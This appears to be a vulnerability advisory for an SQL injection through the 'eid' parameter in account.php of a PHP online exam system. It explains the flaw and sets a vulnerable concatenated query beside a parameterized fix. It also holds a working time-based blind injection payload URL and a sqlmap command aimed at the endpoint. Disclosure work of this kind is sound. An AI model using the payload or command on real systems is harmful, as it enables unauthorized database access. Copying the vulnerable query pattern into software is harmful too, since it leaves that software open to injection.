
code-projects online-exam-mastering-system-php has SQL injection in account.php

supplier

https://code-projects.org/online-exam-mastering-system-php/

description

In account.php,

Code analysis

The SQL injection vulnerability exists because the value of $_GET['eid'] is embedded directly into the SQL queries without any validation or sanitization. If an attacker supplies malicious SQL code as the eid parameter, the database executes it as part of the query. For example, if eid is set to '1' OR '1'='1', it could manipulate the query to return or modify unintended data. Always use prepared statements or parameterized queries to prevent this.
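The concatenated pattern described above next to a parameterized version, as an added example that is not the project's own code. The `questions` table, its columns, the function names and the 13-hex-character id format are assumptions, and an in-memory SQLite database (via PDO) stands in for the application's database so the script runs offline. For the OR input from the text, the concatenated query returns every row while the bound query returns none.

```php
<?php
// Added example: constructed schema and rows; table and column names are assumptions.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE questions (eid TEXT, sn INTEGER, qns TEXT)");
$db->exec("INSERT INTO questions VALUES
    ('5589741f9ed52', 1, 'constructed question A'),
    ('aaaaaaaaaaaaa', 1, 'constructed question B')");

// Vulnerable pattern: the request value is concatenated into the SQL text,
// so quote characters in $eid change the structure of the WHERE clause.
function questions_concat(PDO $db, string $eid): array {
    $sql = "SELECT qns FROM questions WHERE eid='$eid' AND sn=1";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: the value is bound as a parameter and can only ever be compared
// as data. The allow-list check is defense in depth, not the primary fix.
function questions_bound(PDO $db, string $eid): array {
    // Assumption: exam ids are 13 lowercase hex characters, like the sample value.
    if (!preg_match('/\A[0-9a-f]{13}\z/', $eid)) {
        return [];
    }
    $stmt = $db->prepare("SELECT qns FROM questions WHERE eid = :eid AND sn = 1");
    $stmt->execute([':eid' => $eid]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: one legitimate id and the boolean example from the text.
$inputs = [
    'legitimate id' => '5589741f9ed52',
    'OR example'    => "1' OR '1'='1",
];
foreach ($inputs as $label => $eid) {
    printf("%-14s concat=%d rows, bound=%d rows\n", $label,
        count(questions_concat($db, $eid)), count(questions_bound($db, $eid)));
}
```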

payload

http://host/account.php?q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 9913 FROM (SELECT(SLEEP(5)))emka) AND 'nnHe'='nnHe&n=1&t=5

exploit

Use sqlmap to attack:

sqlmap -u "/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5" -p eid --batch
